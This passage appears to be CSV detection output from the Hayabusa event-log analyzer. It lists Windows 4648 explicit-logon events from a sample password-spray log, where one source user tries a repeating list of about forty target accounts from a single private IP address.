2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | 
IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 
Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:10.754 
+09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP 
Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 
Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:35.670 
+09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 